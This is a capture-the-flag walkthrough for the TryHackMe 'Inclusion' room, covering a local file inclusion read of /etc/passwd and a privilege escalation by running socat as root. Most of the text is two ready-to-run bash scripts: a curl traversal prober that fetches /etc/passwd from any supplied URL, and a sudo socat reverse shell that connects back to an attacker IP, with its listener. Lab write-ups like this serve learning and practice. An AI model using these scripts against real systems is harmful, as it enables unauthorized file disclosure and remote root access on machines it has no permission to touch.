Inclusion – Try Hack Me

Hello guys. This room is rated as easy on THM, and from the name we can guess that we'll have to exploit an LFI (local file inclusion) to get initial access.

Let's dive in and start with an Nmap scan.

Nmap scan

Accessing the web application, we notice that it is a blog. Clicking the View details button shows that the article is loaded through a GET request with a ?name= parameter, which is the obvious place to test for file inclusion.

Let's check whether the name parameter is vulnerable to LFI. I started by requesting /etc/passwd directly, then prepended ../ one directory at a time until the file came back (the response will start with the root:x:0:0: entry once the depth is right).
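The "move one directory up until it works" loop above, as an added shell example that is not part of the original write-up: it builds traversal payloads of increasing depth, fetches each one and stops at the first response that actually looks like /etc/passwd rather than an error page echoing the payload back. The article path (/article) and the base URL are assumptions for illustration; the ?name= parameter is the one seen on the site.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: walk traversal depths
# against an LFI parameter until /etc/passwd comes back.
# Assumptions: the vulnerable page lives at a path like /article and takes
# ?name= as seen on the site; TARGET is supplied by the operator.

# Build a traversal payload: <depth> copies of "../" followed by the wanted
# file with its leading slash stripped, e.g. depth 3 -> ../../../etc/passwd
build_payload() {
    depth=$1
    file=${2#/}
    payload=""
    i=0
    while [ "$i" -lt "$depth" ]; do
        payload="${payload}../"
        i=$((i + 1))
    done
    printf '%s%s' "$payload" "$file"
}

# /etc/passwd always opens with the root entry. Matching on it avoids false
# positives from error pages that merely echo the payload back at us.
looks_like_passwd() {
    printf '%s\n' "$1" | grep -q '^root:x:0:0:'
}

# Default fetcher: plain HTTP GET. Override with LFI_FETCH=<function name> to
# dry-run the loop against a constructed responder instead of a live host.
fetch_http() {
    curl -s --max-time 5 "$1"
}

# Try depths 0..max against "<url><payload>" and print the first depth that
# returns /etc/passwd; return 1 if none does.
find_depth() {
    url=$1          # e.g. http://10.10.10.10/article?name=   (assumed path)
    max=${2:-8}
    fetcher=${LFI_FETCH:-fetch_http}
    d=0
    while [ "$d" -le "$max" ]; do
        p=$(build_payload "$d" /etc/passwd)
        body=$("$fetcher" "${url}${p}")
        if looks_like_passwd "$body"; then
            echo "$d"
            return 0
        fi
        d=$((d + 1))
    done
    return 1
}

# Usage: TARGET='http://10.10.10.10/article?name=' bash lfi_probe.sh
if [ -n "${TARGET:-}" ]; then
    if depth=$(find_depth "$TARGET"); then
        echo "[+] depth $depth works: $(build_payload "$depth" /etc/passwd)"
    else
        echo "[-] no depth up to 8 returned /etc/passwd"
    fi
fi
```

Once the depth is known, the same payload shape works for any other file the web server's user can read; swap /etc/passwd for the file you want and keep the ../ prefix.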

/etc/passwd file

One of the entries carries a comment (the GECOS field of the passwd line) from which we can obtain what we need for initial access.

Initial access

You can grab the user flag from the user's home directory.

User flag

Time to privesc!

Some enumeration shows that we can run socat as root. The privesc method is on the GTFOBins socat page, here.

First, I used socat to create a listener on my machine.

Socat listener

Then, running socat as root on the target, I connected back to that listener to get the reverse shell.

Socat rev shell

Back in the terminal where we set up the listener, we have the reverse shell and we are root.

Root user
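The whole privesc step above as one added shell example (not the write-up's own commands and not taken from the GTFOBins page verbatim, though the two socat invocations follow the GTFOBins socat entry linked earlier): it first checks the `sudo -l` output for a rule that lets socat run as root, then provides the listener and the connect-back halves. It assumes the root-level socat is granted through sudo; the attacker IP and port are placeholders passed on the command line.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: confirm from `sudo -l`
# that socat runs as root, then the listener/connect pair from the GTFOBins
# socat page. Assumptions: root-level socat is granted via sudo, and the
# attacker IP/port are placeholders you pass on the command line.

# Read `sudo -l` output on stdin and return 0 if <binary> (or ALL) may be run
# as root. Rule lines look like "    (root) NOPASSWD: /usr/bin/socat" or
# "    (ALL : ALL) ALL"; rules for other run-as users are ignored.
sudo_can_run_as_root() {
    bin=$1
    grep -E '^[[:space:]]*\((root|ALL)[^)]*\)' \
      | grep -Eq "(^|[[:space:],])ALL([[:space:],]|\$)|(^|[[:space:],/])${bin}([[:space:],]|\$)"
}

# Attacker box: raw tty listener so the pty shell we get back behaves properly.
start_listener() {
    port=$1
    socat file:"$(tty)",raw,echo=0 tcp-listen:"$port"
}

# Target box: socat runs as root and hands /bin/sh back over the socket.
# (If a local root shell is enough: sudo socat stdin exec:/bin/sh)
connect_back() {
    rhost=$1
    rport=$2
    sudo socat tcp-connect:"${rhost}:${rport}" exec:/bin/sh,pty,stderr,setsid,sigint,sane
}

# Usage:
#   bash socat_privesc.sh check                  (on the target)
#   bash socat_privesc.sh listen 4444            (on the attacker box)
#   bash socat_privesc.sh shell 10.9.0.1 4444    (on the target; IP/port are placeholders)
case "${1:-}" in
    check)  sudo -l | sudo_can_run_as_root socat && echo "[+] socat runs as root" ;;
    listen) start_listener "${2:?listen port}" ;;
    shell)  connect_back "${2:?attacker ip}" "${3:?attacker port}" ;;
esac
```

Run the check first: a rule such as `(www-data) /usr/bin/socat` lets you run socat, but not as root, and the connect-back would just hand you a shell as the same user.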

Hope you learned something! For me it was an easy and fun room.